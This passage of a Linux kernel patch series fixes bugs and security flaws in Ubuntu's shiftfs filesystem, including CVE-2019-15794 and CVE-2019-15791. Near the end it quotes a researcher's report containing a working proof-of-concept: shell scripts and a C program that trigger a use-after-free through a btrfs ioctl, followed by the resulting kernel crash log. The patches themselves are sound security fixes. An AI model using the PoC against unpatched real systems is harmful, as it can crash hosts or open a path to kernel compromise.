performance benefits of O_DIRECT on suitable filesystems when used -with async io such as aio or io_uring. -Overlayfs cannot support this directly since the upper filesystem in -overlay can be any filesystem. So if the upper filesystem does not -support O_DIRECT but the lower filesystem does you're out of luck. -Shiftfs does not suffer from the same problem since there is not concept -of an upper filesystem in the same way that overlayfs has it. -Essentially, shiftfs is a transparent shim relaying everything to the -underlay while overlayfs' upper layer is not (completely). - -Cc: Seth Forshee <seth.forshee@canonical.com> -Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com> -Signed-off-by: Seth Forshee <seth.forshee@canonical.com> -Signed-off-by: Mike Pagano <mpagano@gentoo.org> ---- - fs/shiftfs.c | 3 +++ - 1 file changed, 3 insertions(+) - -diff --git a/fs/shiftfs.c b/fs/shiftfs.c -index 49f6714e9f95..addaa6e21e57 100644 ---- a/fs/shiftfs.c -+++ b/fs/shiftfs.c -@@ -1126,6 +1126,9 @@ static int shiftfs_open(struct inode *inode, struct file *file) - } - - file->private_data = file_info; -+ /* For O_DIRECT dentry_open() checks f_mapping->a_ops->direct_IO. */ -+ file->f_mapping = realfile->f_mapping; -+ - file_info->realfile = realfile; - return 0; - } --- -2.39.2 - -From 772a8ea3a85f0530a76bc8dbe4e91de92aa35180 Mon Sep 17 00:00:00 2001 -From: Christian Brauner <christian@brauner.io> -Date: Fri, 19 Jul 2019 17:50:47 +0200 -Subject: [PATCH] UBUNTU: SAUCE: shiftfs: pass correct point down -Cc: mpagano@gentoo.org - -BugLink: https://bugs.launchpad.net/bugs/1837231 - -This used to pass an unsigned long to copy_from_user() instead of a -void __user * pointer. This will produce warning with a sufficiently -advanced compiler. - -Cc: Seth Forshee <seth.forshee@canonical.com> -Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com> -Signed-off-by: Seth Forshee <seth.forshee@canonical.com> -Signed-off-by: Mike Pagano <mpagano@gentoo.org> ---- - fs/shiftfs.c | 2 +- - 1 file changed, 1 insertion(+), 1 deletion(-) - -diff --git a/fs/shiftfs.c b/fs/shiftfs.c -index addaa6e21e57..9006201c243d 100644 ---- a/fs/shiftfs.c -+++ b/fs/shiftfs.c -@@ -1529,7 +1529,7 @@ static bool in_ioctl_whitelist(int flag, unsigned long arg) - case BTRFS_IOC_SUBVOL_GETFLAGS: - return true; - case BTRFS_IOC_SUBVOL_SETFLAGS: -- if (copy_from_user(&flags, arg, sizeof(flags))) -+ if (copy_from_user(&flags, argp, sizeof(flags))) - return false; - - if (flags & ~BTRFS_SUBVOL_RDONLY) --- -2.39.2 - -From ca8b1596f4e2a5a3c8ee7b7cb45d4703b329c891 Mon Sep 17 00:00:00 2001 -From: Christian Brauner <christian.brauner@ubuntu.com> -Date: Thu, 29 Aug 2019 20:45:07 +0200 -Subject: [PATCH] UBUNTU: SAUCE: shiftfs: fix buggy unlink logic -Cc: mpagano@gentoo.org - -BugLink: https://bugs.launchpad.net/bugs/1841977 - -The way we messed with setting i_nlink was brittle and wrong. We used to -set the i_nlink of the shiftfs dentry to be deleted to the i_nlink count -of the underlay dentry of the directory it resided in which makes no -sense whatsoever. We also missed drop_nlink() which is crucial since -i_nlink affects whether a dentry is cleaned up on dput(). -With this I cannot reproduce the bug anymore where shiftfs misleads zfs -into believing that a deleted file can not be removed from disk because -it is still referenced. - -Fixes: commit 87011da41961 ("shiftfs: rework and extend") -Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com> -Signed-off-by: Seth Forshee <seth.forshee@canonical.com> -Signed-off-by: Mike Pagano <mpagano@gentoo.org> ---- - fs/shiftfs.c | 15 ++++++++++----- - 1 file changed, 10 insertions(+), 5 deletions(-) - -diff --git a/fs/shiftfs.c b/fs/shiftfs.c -index 9006201c243d..e80db9480b5c 100644 ---- a/fs/shiftfs.c -+++ b/fs/shiftfs.c -@@ -585,6 +585,7 @@ static int shiftfs_rm(struct inode *dir, struct dentry *dentry, bool rmdir) - { - struct dentry *lowerd = dentry->d_fsdata; - struct inode *loweri = dir->i_private; -+ struct inode *inode = d_inode(dentry); - int err; - const struct cred *oldcred; - -@@ -594,15 +595,19 @@ static int shiftfs_rm(struct inode *dir, struct dentry *dentry, bool rmdir) - err = vfs_rmdir(loweri, lowerd); - else - err = vfs_unlink(loweri, lowerd, NULL); -- inode_unlock(loweri); - revert_creds(oldcred); - -- shiftfs_copyattr(loweri, dir); -- set_nlink(d_inode(dentry), loweri->i_nlink); -- if (!err) -+ if (!err) { - d_drop(dentry); - -- set_nlink(dir, loweri->i_nlink); -+ if (rmdir) -+ clear_nlink(inode); -+ else -+ drop_nlink(inode); -+ } -+ inode_unlock(loweri); -+ -+ shiftfs_copyattr(loweri, dir); - - return err; - } --- -2.39.2 - -From 81445d2871aef886eabb56c7f124d491f445fcc7 Mon Sep 17 00:00:00 2001 -From: Christian Brauner <christian.brauner@ubuntu.com> -Date: Fri, 30 Aug 2019 14:14:31 +0200 -Subject: [PATCH] UBUNTU: SAUCE: shiftfs: mark slab objects - SLAB_RECLAIM_ACCOUNT -Cc: mpagano@gentoo.org - -BugLink: https://bugs.launchpad.net/bugs/1842059 - -Shiftfs does not mark it's slab cache as reclaimable. While this is not -a big deal it is not nice to the kernel in general. The shiftfs cache is -not so important that it can't be reclaimed. - -Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com> -Signed-off-by: Seth Forshee <seth.forshee@canonical.com> -Signed-off-by: Mike Pagano <mpagano@gentoo.org> ---- - fs/shiftfs.c | 2 +- - 1 file changed, 1 insertion(+), 1 deletion(-) - -diff --git a/fs/shiftfs.c b/fs/shiftfs.c -index e80db9480b5c..a21cb473e000 100644 ---- a/fs/shiftfs.c -+++ b/fs/shiftfs.c -@@ -2108,7 +2108,7 @@ static int __init shiftfs_init(void) - { - shiftfs_file_info_cache = kmem_cache_create( - "shiftfs_file_info_cache", sizeof(struct shiftfs_file_info), 0, -- SLAB_HWCACHE_ALIGN | SLAB_ACCOUNT | SLAB_MEM_SPREAD, NULL); -+ SLAB_RECLAIM_ACCOUNT | SLAB_HWCACHE_ALIGN | SLAB_ACCOUNT | SLAB_MEM_SPREAD, NULL); - if (!shiftfs_file_info_cache) - return -ENOMEM; - --- -2.39.2 - -From 3d0e90c90e6b1b915b9ac760c865529b28cf1cdd Mon Sep 17 00:00:00 2001 -From: Christian Brauner <christian.brauner@ubuntu.com> -Date: Wed, 2 Oct 2019 09:57:14 +0200 -Subject: [PATCH] UBUNTU: SAUCE: shiftfs: rework how shiftfs opens files -Cc: mpagano@gentoo.org - -BugLink: https://bugs.launchpad.net/bugs/1846265 - -This commit simplifies how shiftfs open files, both regular files an -directories. - -In the first iteration, we implemented a kmem cache for struct -shiftfs_file_info which stashed away a struct path and the struct file -for the underlay. The path however was never used anywhere so the struct -shiftfs_file_info and therefore the whole kmem cache can go away. -Instead we move to the same model as overlayfs and just stash away the -struct file for the underlay in file->private_data of the shiftfs struct -file. -Addtionally, we split the .open method for files and directories. -Similar to overlayfs .open for regular files uses open_with_fake_path() -which ensures that it doesn't contribute to the open file count (since -this would mean we'd count double). The .open method for directories -however used dentry_open() which contributes to the open file count. - -The basic logic for opening files is unchanged. The main point is to -ensure that a reference to the underlay's dentry is kept through struct -path. - -Various bits and pieces of this were cooked up in discussions Seth and I -had in Paris. - -Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com> -Signed-off-by: Seth Forshee <seth.forshee@canonical.com> -Signed-off-by: Mike Pagano <mpagano@gentoo.org> ---- - fs/shiftfs.c | 105 +++++++++++++++++++++++---------------------------- - 1 file changed, 47 insertions(+), 58 deletions(-) - -diff --git a/fs/shiftfs.c b/fs/shiftfs.c -index a21cb473e000..55bb32b611f2 100644 ---- a/fs/shiftfs.c -+++ b/fs/shiftfs.c -@@ -31,13 +31,6 @@ struct shiftfs_super_info { - unsigned int passthrough_mark; - }; - --struct shiftfs_file_info { -- struct path realpath; -- struct file *realfile; --}; -- --struct kmem_cache *shiftfs_file_info_cache; -- - static void shiftfs_fill_inode(struct inode *inode, unsigned long ino, - umode_t mode, dev_t dev, struct dentry *dentry); - -@@ -1042,21 +1035,21 @@ static const struct inode_operations shiftfs_symlink_inode_operations = { - }; - - static struct file *shiftfs_open_realfile(const struct file *file, -- struct path *realpath) -+ struct inode *realinode) - { -- struct file *lowerf; -- const struct cred *oldcred; -+ struct file *realfile; -+ const struct cred *old_cred; - struct inode *inode = file_inode(file); -- struct inode *loweri = realpath->dentry->d_inode; -+ struct dentry *lowerd = file->f_path.dentry->d_fsdata; - struct shiftfs_super_info *info = inode->i_sb->s_fs_info; -+ struct path realpath = { .mnt = info->mnt, .dentry = lowerd }; - -- oldcred = shiftfs_override_creds(inode->i_sb); -- /* XXX: open_with_fake_path() not gauranteed to stay around, if -- * removed use dentry_open() */ -- lowerf = open_with_fake_path(realpath, file->f_flags, loweri, info->creator_cred); -- revert_creds(oldcred); -+ old_cred = shiftfs_override_creds(inode->i_sb); -+ realfile = open_with_fake_path(&realpath, file->f_flags, realinode, -+ info->creator_cred); -+ revert_creds(old_cred); - -- return lowerf; -+ return realfile; - } - - #define SHIFTFS_SETFL_MASK (O_APPEND | O_NONBLOCK | O_NDELAY | O_DIRECT) -@@ -1096,8 +1089,7 @@ static int shiftfs_change_flags(struct file *file, unsigned int flags) - - static int shiftfs_real_fdget(const struct file *file, struct fd *lowerfd) - { -- struct shiftfs_file_info *file_info = file->private_data; -- struct file *realfile = file_info->realfile; -+ struct file *realfile = file->private_data; - - lowerfd->flags = 0; - lowerfd->file = realfile; -@@ -1111,51 +1103,57 @@ static int shiftfs_real_fdget(const struct file *file, struct fd *lowerfd) - - static int shiftfs_open(struct inode *inode, struct file *file) - { -- struct shiftfs_super_info *ssi = inode->i_sb->s_fs_info; -- struct shiftfs_file_info *file_info; - struct file *realfile; -- struct path *realpath; - -- file_info = kmem_cache_zalloc(shiftfs_file_info_cache, GFP_KERNEL); -- if (!file_info) -- return -ENOMEM; -- -- realpath = &file_info->realpath; -- realpath->mnt = ssi->mnt; -- realpath->dentry = file->f_path.dentry->d_fsdata; -- -- realfile = shiftfs_open_realfile(file, realpath); -- if (IS_ERR(realfile)) { -- kmem_cache_free(shiftfs_file_info_cache, file_info); -+ realfile = shiftfs_open_realfile(file, inode->i_private); -+ if (IS_ERR(realfile)) - return PTR_ERR(realfile); -- } - -- file->private_data = file_info; -+ file->private_data = realfile; - /* For O_DIRECT dentry_open() checks f_mapping->a_ops->direct_IO. */ - file->f_mapping = realfile->f_mapping; - -- file_info->realfile = realfile; - return 0; - } - --static int shiftfs_release(struct inode *inode, struct file *file) -+static int shiftfs_dir_open(struct inode *inode, struct file *file) - { -- struct shiftfs_file_info *file_info = file->private_data; -+ struct file *realfile; -+ const struct cred *oldcred; -+ struct dentry *lowerd = file->f_path.dentry->d_fsdata; -+ struct shiftfs_super_info *info = inode->i_sb->s_fs_info; -+ struct path realpath = { .mnt = info->mnt, .dentry = lowerd }; -+ -+ oldcred = shiftfs_override_creds(file->f_path.dentry->d_sb); -+ realfile = dentry_open(&realpath, file->f_flags | O_NOATIME, -+ info->creator_cred); -+ revert_creds(oldcred); -+ if (IS_ERR(realfile)) -+ return PTR_ERR(realfile); - -- if (file_info) { -- if (file_info->realfile) -- fput(file_info->realfile); -+ file->private_data = realfile; - -- kmem_cache_free(shiftfs_file_info_cache, file_info); -- } -+ return 0; -+} -+ -+static int shiftfs_release(struct inode *inode, struct file *file) -+{ -+ struct file *realfile = file->private_data; -+ -+ if (realfile) -+ fput(realfile); - - return 0; - } - -+static int shiftfs_dir_release(struct inode *inode, struct file *file) -+{ -+ return shiftfs_release(inode, file); -+} -+ - static loff_t shiftfs_dir_llseek(struct file *file, loff_t offset, int whence) - { -- struct shiftfs_file_info *file_info = file->private_data; -- struct file *realfile = file_info->realfile; -+ struct file *realfile = file->private_data; - - return vfs_llseek(realfile, offset, whence); - } -@@ -1274,8 +1272,7 @@ static int shiftfs_fsync(struct file *file, loff_t start, loff_t end, - - static int shiftfs_mmap(struct file *file, struct vm_area_struct *vma) - { -- struct shiftfs_file_info *file_info = file->private_data; -- struct file *realfile = file_info->realfile; -+ struct file *realfile = file->private_data; - const struct cred *oldcred; - int ret; - -@@ -1671,8 +1668,7 @@ static int shiftfs_iterate_shared(struct file *file, struct dir_context *ctx) - { - const struct cred *oldcred; - int err = -ENOTDIR; -- struct shiftfs_file_info *file_info = file->private_data; -- struct file *realfile = file_info->realfile; -+ struct file *realfile = file->private_data; - - oldcred = shiftfs_override_creds(file->f_path.dentry->d_sb); - err = iterate_dir(realfile, ctx); -@@ -1698,13 +1694,13 @@ const struct file_operations shiftfs_file_operations = { - }; - - const struct file_operations shiftfs_dir_operations = { -+ .open = shiftfs_dir_open, -+ .release = shiftfs_dir_release, - .compat_ioctl = shiftfs_compat_ioctl, - .fsync = shiftfs_fsync, - .iterate_shared = shiftfs_iterate_shared, - .llseek = shiftfs_dir_llseek, -- .open = shiftfs_open, - .read = generic_read_dir, -- .release = shiftfs_release, - .unlocked_ioctl = shiftfs_ioctl, - }; - -@@ -2106,19 +2102,12 @@ static struct file_system_type shiftfs_type = { - - static int __init shiftfs_init(void) - { -- shiftfs_file_info_cache = kmem_cache_create( -- "shiftfs_file_info_cache", sizeof(struct shiftfs_file_info), 0, -- SLAB_RECLAIM_ACCOUNT | SLAB_HWCACHE_ALIGN | SLAB_ACCOUNT | SLAB_MEM_SPREAD, NULL); -- if (!shiftfs_file_info_cache) -- return -ENOMEM; -- - return register_filesystem(&shiftfs_type); - } - - static void __exit shiftfs_exit(void) - { - unregister_filesystem(&shiftfs_type); -- kmem_cache_destroy(shiftfs_file_info_cache); - } - - MODULE_ALIAS_FS("shiftfs"); --- -2.39.2 - -From 0afd6d19d12a42d7905110a41cdb3815e023467c Mon Sep 17 00:00:00 2001 -From: Seth Forshee <seth.forshee@canonical.com> -Date: Wed, 6 Nov 2019 09:38:57 -0600 -Subject: [PATCH] UBUNTU: SAUCE: shiftfs: Restore vm_file value when lower fs - mmap fails -Cc: mpagano@gentoo.org - -BugLink: https://bugs.launchpad.net/bugs/1850994 - -shiftfs_mmap() overwrites vma->vm_file before calling the lower -filesystem mmap but does not restore the original value on -failure. This means it is giving a pointer to the lower fs file -back to the caller with no reference, which is a bad practice. -However, it does not lead to any issues with upstream kernels as -no caller accesses vma->vm_file after call_mmap(). - -With the aufs patches applied the story is different. Whereas -mmap_region() previously fput a local variable containing the -file it assigned to vm_file, it now calls vma_fput() which will -fput vm_file, for which it has no reference, and the reference -for the original vm_file is not put. - -Fix this by restoring vma->vm_file to the original value when the -mmap call into the lower fs fails. - -CVE-2019-15794 - -Reported-by: Jann Horn <jannh@google.com> -Signed-off-by: Seth Forshee <seth.forshee@canonical.com> -Signed-off-by: Mike Pagano <mpagano@gentoo.org> ---- - fs/shiftfs.c | 15 +++++++++++---- - 1 file changed, 11 insertions(+), 4 deletions(-) - -diff --git a/fs/shiftfs.c b/fs/shiftfs.c -index 55bb32b611f2..57d84479026b 100644 ---- a/fs/shiftfs.c -+++ b/fs/shiftfs.c -@@ -1289,10 +1289,17 @@ static int shiftfs_mmap(struct file *file, struct vm_area_struct *vma) - - shiftfs_file_accessed(file); - -- if (ret) -- fput(realfile); /* Drop refcount from new vm_file value */ -- else -- fput(file); /* Drop refcount from previous vm_file value */ -+ if (ret) { -+ /* -+ * Drop refcount from new vm_file value and restore original -+ * vm_file value -+ */ -+ vma->vm_file = file; -+ fput(realfile); -+ } else { -+ /* Drop refcount from previous vm_file value */ -+ fput(file); -+ } - - return ret; - } --- -2.39.2 - -From 5b548337ff886dfb00ec3a142693226394673126 Mon Sep 17 00:00:00 2001 -From: Christian Brauner <christian.brauner@ubuntu.com> -Date: Wed, 23 Oct 2019 14:22:28 +0200 -Subject: [PATCH] UBUNTU: SAUCE: shiftfs: setup correct s_maxbytes limit -Cc: mpagano@gentoo.org - -BugLink: https://bugs.launchpad.net/bugs/1849482 - -Set the s_maxbytes limit to MAX_LFS_FILESIZE. -Currently shiftfs limits the maximum size for fallocate() needlessly -causing calls such as fallocate --length 2GB ./file to fail. This -limitation is arbitrary since it's not caused by the underlay but -rather by shiftfs itself capping the s_maxbytes. This causes bugs such -as the one reported in [1]. - -[1]: https://github.com/lxc/lxd/issues/6333 -Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com> -Acked-by: Connor Kuehl <connor.kuehl@canonical.com> -Acked-by: Stefan Bader <stefan.bader@canonical.com> -Signed-off-by: Seth Forshee <seth.forshee@canonical.com> -Signed-off-by: Mike Pagano <mpagano@gentoo.org> ---- - fs/shiftfs.c | 1 + - 1 file changed, 1 insertion(+) - -diff --git a/fs/shiftfs.c b/fs/shiftfs.c -index 57d84479026b..6a2b5e3d0d53 100644 ---- a/fs/shiftfs.c -+++ b/fs/shiftfs.c -@@ -2064,6 +2064,7 @@ static int shiftfs_fill_super(struct super_block *sb, void *raw_data, - inode->i_private = dentry->d_inode; - - sb->s_magic = SHIFTFS_MAGIC; -+ sb->s_maxbytes = MAX_LFS_FILESIZE; - sb->s_op = &shiftfs_super_ops; - sb->s_xattr = shiftfs_xattr_handlers; - sb->s_d_op = &shiftfs_dentry_ops; --- -2.39.2 - -From fa7001e866380a4d2f45022295b6db1fd0cf12c5 Mon Sep 17 00:00:00 2001 -From: Christian Brauner <christian.brauner@ubuntu.com> -Date: Wed, 23 Oct 2019 14:23:50 +0200 -Subject: [PATCH] UBUNTU: SAUCE: shiftfs: drop CAP_SYS_RESOURCE from effective - capabilities -Cc: mpagano@gentoo.org - -BugLink: https://bugs.launchpad.net/bugs/1849483 - -Currently shiftfs allows to exceed project quota and reserved space on -e.g. ext2. See [1] and especially [2] for a bug report. This is very -much not what we want. Quotas and reserverd space settings set on the -host need to respected. The cause for this issue is overriding the -credentials with the superblock creator's credentials whenever we -perform operations such as fallocate() or writes while retaining -CAP_SYS_RESOURCE. - -The fix is to drop CAP_SYS_RESOURCE from the effective capability set -after we have made a copy of the superblock creator's credential at -superblock creation time. This very likely gives us more security than -we had before and the regression potential seems limited. I would like -to try this apporach first before coming up with something potentially -more sophisticated. I don't see why CAP_SYS_RESOURCE should become a -limiting factor in most use-cases. - -[1]: https://github.com/lxc/lxd/issues/6333 -[2]: https://github.com/lxc/lxd/issues/6333#issuecomment-545154838 -Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com> -Acked-by: Connor Kuehl <connor.kuehl@canonical.com> -Acked-by: Stefan Bader <stefan.bader@canonical.com> -Signed-off-by: Seth Forshee <seth.forshee@canonical.com> -Signed-off-by: Mike Pagano <mpagano@gentoo.org> ---- - fs/shiftfs.c | 8 ++++++-- - 1 file changed, 6 insertions(+), 2 deletions(-) - -diff --git a/fs/shiftfs.c b/fs/shiftfs.c -index 6a2b5e3d0d53..0d6ce377b07c 100644 ---- a/fs/shiftfs.c -+++ b/fs/shiftfs.c -@@ -1958,6 +1958,7 @@ static int shiftfs_fill_super(struct super_block *sb, void *raw_data, - sb->s_flags |= SB_POSIXACL; - - if (sbinfo->mark) { -+ struct cred *cred_tmp; - struct super_block *lower_sb = path.mnt->mnt_sb; - - /* to mark a mount point, must root wrt lower s_user_ns */ -@@ -2012,11 +2013,14 @@ static int shiftfs_fill_super(struct super_block *sb, void *raw_data, - sbinfo->passthrough_mark = sbinfo->passthrough; - } - -- sbinfo->creator_cred = prepare_creds(); -- if (!sbinfo->creator_cred) { -+ cred_tmp = prepare_creds(); -+ if (!cred_tmp) { - err = -ENOMEM; - goto out_put_path; - } -+ /* Don't override disk quota limits or use reserved space. */ -+ cap_lower(cred_tmp->cap_effective, CAP_SYS_RESOURCE); -+ sbinfo->creator_cred = cred_tmp; - } else { - /* - * This leg executes if we're admin capable in the namespace, --- -2.39.2 - -From a73880c13fc011fba13bfbf3197b98500c8c4906 Mon Sep 17 00:00:00 2001 -From: Seth Forshee <seth.forshee@canonical.com> -Date: Fri, 1 Nov 2019 10:41:03 -0500 -Subject: [PATCH] UBUNTU: SAUCE: shiftfs: Fix refcount underflow in btrfs ioctl - handling -Cc: mpagano@gentoo.org - -BugLink: https://bugs.launchpad.net/bugs/1850867 - -shiftfs_btrfs_ioctl_fd_replace() installs an fd referencing a -file from the lower filesystem without taking an additional -reference to that file. After the btrfs ioctl completes this fd -is closed, which then puts a reference to that file, leading to a -refcount underflow. Original bug report and test case from Jann -Horn is below. - -Fix this, and at the sametime simplify the management of the fd -to the lower file for the ioctl. In -shiftfs_btrfs_ioctl_fd_replace(), take the missing reference to -the lower file and set FDPUT_FPUT so that this reference will get -dropped on fdput() in error paths. Do not maintain the struct fd -in the caller, as it the fd installed in the fd table is -sufficient to properly clean up. Finally, remove the fdput() in -shiftfs_btrfs_ioctl_fd_restore() as it is redundant with the -__close_fd() call. - -Original report from Jann Horn: - -In shiftfs_btrfs_ioctl_fd_replace() ("//" comments added by me): - - src = fdget(oldfd); - if (!src.file) - return -EINVAL; - // src holds one reference (assuming multithreaded execution) - - ret = shiftfs_real_fdget(src.file, lfd); - // lfd->file is a file* now, but shiftfs_real_fdget didn't take any - // extra references - fdput(src); - // this drops the only reference we were holding on src, and src was - // the only thing holding a reference to lfd->file. lfd->file may be - // dangling at this point. - if (ret) - return ret; - - *newfd = get_unused_fd_flags(lfd->file->f_flags); - if (*newfd < 0) { - // always a no-op - fdput(*lfd); - return *newfd; - } - - fd_install(*newfd, lfd->file); - // fd_install() consumes a counted reference, but we don't hold any - // counted references. so at this point, if lfd->file hasn't been freed - // yet, its refcount is one lower than it ought to be. - - [...] - - // the following code is refcount-neutral, so the refcount stays one too - // low. - if (ret) - shiftfs_btrfs_ioctl_fd_restore(cmd, *lfd, *newfd, arg, v1, v2); - -shiftfs_real_fdget() is implemented as follows: - -static int shiftfs_real_fdget(const struct file *file, struct fd *lowerfd) -{ - struct shiftfs_file_info *file_info = file->private_data; - struct file *realfile = file_info->realfile; - - lowerfd->flags = 0; - lowerfd->file = realfile; - - /* Did the flags change since open? */ - if (unlikely(file->f_flags & ~lowerfd->file->f_flags)) - return shiftfs_change_flags(lowerfd->file, file->f_flags); - - return 0; -} - -Therefore, the following PoC will cause reference count overdecrements; I ran it -with SLUB debugging enabled and got the following splat: - -======================================= -user@ubuntu1910vm:~/shiftfs$ cat run.sh -sync -unshare -mUr ./run2.sh -t run2user@ubuntu1910vm:~/shiftfs$ cat run2.sh -set -e - -mkdir -p mnt/tmpfs -mkdir -p mnt/shiftfs -mount -t tmpfs none mnt/tmpfs -mount -t shiftfs -o mark,passthrough=2 mnt/tmpfs mnt/shiftfs -mount|grep shift -touch mnt/tmpfs/foo -gcc -o ioctl ioctl.c -Wall -./ioctl -user@ubuntu1910vm:~/shiftfs$ cat ioctl.c - -int main(void) { - int root = open("mnt/shiftfs", O_RDONLY); - if (root == -1) err(1, "open shiftfs root"); - int foofd = openat(root, "foo", O_RDONLY); - if (foofd == -1) err(1, "open foofd"); - struct btrfs_ioctl_vol_args iocarg = { - .fd = foofd - }; - ioctl(root, BTRFS_IOC_SNAP_CREATE, &iocarg); - sleep(1); - void *map = mmap(NULL, 0x1000, PROT_READ, MAP_SHARED, foofd, 0); - if (map != MAP_FAILED) munmap(map, 0x1000); -} -user@ubuntu1910vm:~/shiftfs$ ./run.sh -none on /home/user/shiftfs/mnt/tmpfs type tmpfs (rw,relatime,uid=1000,gid=1000) -/home/user/shiftfs/mnt/tmpfs on /home/user/shiftfs/mnt/shiftfs type shiftfs (rw,relatime,mark,passthrough=2) -[ 183.463452] general protection fault: 0000 [#1] SMP PTI -[ 183.467068] CPU: 1 PID: 2473 Comm: ioctl Not tainted 5.3.0-19-generic #20-Ubuntu -[ 183.472170] Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.12.0-1 04/01/2014 -[ 183.476830] RIP: 0010:shiftfs_mmap+0x20/0xd0 [shiftfs] -[ 183.478524] Code: 20 cf 5d c3 c3 0f 1f 44 00 00 0f 1f 44 00 00 55 48 89 e5 41 57 41 56 41 55 41 54 48 8b 87 c8 00 00 00 4c 8b 68 10 49 8b 45 28 <48> 83 78 60 00 0f 84 97 00 00 00 49 89 fc 49 89 f6 48 39 be a0 00 -[ 183.484585] RSP: 0018:ffffae48007c3d40 EFLAGS: 00010206 -[ 183.486290] RAX: 6b6b6b6b6b6b6b6b RBX: ffff93f1fb7908a8 RCX: 7800000000000000 -[ 183.489617] RDX: 8000000000000025 RSI: ffff93f1fb792208 RDI: ffff93f1f69fa400 -[ 183.491975] RBP: ffffae48007c3d60 R08: ffff93f1fb792208 R09: 0000000000000000 -[ 183.494311] R10: ffff93f1fb790888 R11: 00007f1d01d10000 R12: ffff93f1fb7908b0 -[ 183.496675] R13: ffff93f1f69f9900 R14: ffff93f1fb792208 R15: ffff93f22f102e40 -[ 183.499011] FS: 00007f1d01cd1540(0000) GS:ffff93f237a40000(0000) knlGS:0000000000000000 -[ 183.501679] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 -[ 183.503568] CR2: 00007f1d01bc4c10 CR3: 0000000242726001 CR4: 0000000000360ee0 -[ 183.505901] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 -[ 183.508229] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 -[ 183.510580] Call Trace: -[ 183.511396] mmap_region+0x417/0x670 -[ 183.512592] do_mmap+0x3a8/0x580 -[ 183.513655] vm_mmap_pgoff+0xcb/0x120 -[ 183.514863] ksys_mmap_pgoff+0x1ca/0x2a0 -[ 183.516155] __x64_sys_mmap+0x33/0x40 -[ 183.517352] do_syscall_64+0x5a/0x130 -[ 183.518548] entry_SYSCALL_64_after_hwframe+0x44/0xa9 -[ 183.520196] RIP: 0033:0x7f1d01bfaaf6 -[ 183.521372] Code: 00 00 00 00 f3 0f 1e fa 41 f7 c1 ff 0f 00 00 75 2b 55 48 89 fd 53 89 cb 48 85 ff 74 37 41 89 da 48 89 ef b8 09 00 00 00 0f 05 <48> 3d 00 f0 ff ff 77 62 5b 5d c3 0f 1f 80 00 00 00 00 48 8b 05 61 -[ 183.527210] RSP: 002b:00007ffdf50bae98 EFLAGS: 00000246 ORIG_RAX: 0000000000000009 -[ 183.529582] RAX: ffffffffffffffda RBX: 0000000000000001 RCX: 00007f1d01bfaaf6 -[ 183.531811] RDX: 0000000000000001 RSI: 0000000000001000 RDI: 0000000000000000 -[ 183.533999] RBP: 0000000000000000 R08: 0000000000000004 R09: 0000000000000000 -[ 183.536199] R10: 0000000000000001 R11: 0000000000000246 R12: 00005616cf6f5140 -[ 183.538448] R13: 00007ffdf50bbfb0 R14: 0000000000000000 R15: 0000000000000000 -[ 183.540714] Modules linked in: shiftfs intel_rapl_msr intel_rapl_common kvm_intel kvm irqbypass snd_hda_codec_generic ledtrig_audio snd_hda_intel snd_hda_codec snd_hda_core crct10dif_pclmul snd_hwdep crc32_pclmul ghash_clmulni_intel snd_pcm aesni_intel snd_seq_midi snd_seq_midi_event aes_x86_64 crypto_simd snd_rawmidi cryptd joydev input_leds snd_seq glue_helper qxl snd_seq_device snd_timer ttm drm_kms_helper drm snd fb_sys_fops syscopyarea sysfillrect sysimgblt serio_raw qemu_fw_cfg soundcore mac_hid sch_fq_codel parport_pc ppdev lp parport virtio_rng ip_tables x_tables autofs4 hid_generic usbhid hid virtio_net net_failover psmouse ahci i2c_i801 libahci lpc_ich virtio_blk failover -[ 183.560350] ---[ end trace 4a860910803657c2 ]--- -[ 183.561832] RIP: 0010:shiftfs_mmap+0x20/0xd0 [shiftfs] -[ 183.563496] Code: 20 cf 5d c3 c3 0f 1f 44 00 00 0f 1f 44 00 00 55 48 89 e5 41 57 41 56 41 55 41 54 48 8b 87 c8 00 00 00 4c 8b 68 10 49 8b 45 28 <48> 83 78 60 00 0f 84 97 00 00 00 49 89 fc 49 89 f6 48 39 be a0 00 -[ 183.569438] RSP: 0018:ffffae48007c3d40 EFLAGS: 00010206 -[ 183.571102] RAX: 6b6b6b6b6b6b6b6b RBX: ffff93f1fb7908a8 RCX: 7800000000000000 -[ 183.573362] RDX: 8000000000000025 RSI: ffff93f1fb792208 RDI: ffff93f1f69fa400 -[ 183.575655] RBP: ffffae48007c3d60 R08: ffff93f1fb792208 R09: 0000000000000000 -[ 183.577893] R10: ffff93f1fb790888 R11: 00007f1d01d10000 R12: ffff93f1fb7908b0 -[ 183.580166] R13: ffff93f1f69f9900 R14: ffff93f1fb792208 R15: ffff93f22f102e40 -[ 183.582411] FS: 00007f1d01cd1540(0000) GS:ffff93f237a40000(0000) knlGS:0000000000000000 -[ 183.584960] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 -[ 183.586796] CR2: 00007f1d01bc4c10 CR3: 0000000242726001 CR4: 0000000000360ee0 -[ 183.589035] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 -[ 183.591279] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 -======================================= - -Disassembly of surrounding code: - -55 push rbp -4889E5 mov rbp,rsp -4157 push r15 -4156 push r14 -4155 push r13 -4154 push r12 -488B87C8000000 mov rax,[rdi+0xc8] -4C8B6810 mov r13,[rax+0x10] -498B4528 mov rax,[r13+0x28] -4883786000 cmp qword [rax+0x60],byte +0x0 <-- GPF HERE -0F8497000000 jz near 0xcc -4989FC mov r12,rdi -4989F6 mov r14,rsi - -This is an attempted dereference of 0x6b6b6b6b6b6b6b6b, which is POISON_FREE; I -think this corresponds to the load of "realfile->f_op->mmap" in the source code. - -Reported-by: Jann Horn <jannh@google.com> -Signed-off-by: Seth Forshee <seth.forshee@canonical.com> - -CVE-2019-15791 - -Acked-by: Tyler Hicks <tyhicks@canonical.com> -Signed-off-by: Stefan Bader <stefan.bader@canonical.com> -Signed-off-by: Mike Pagano 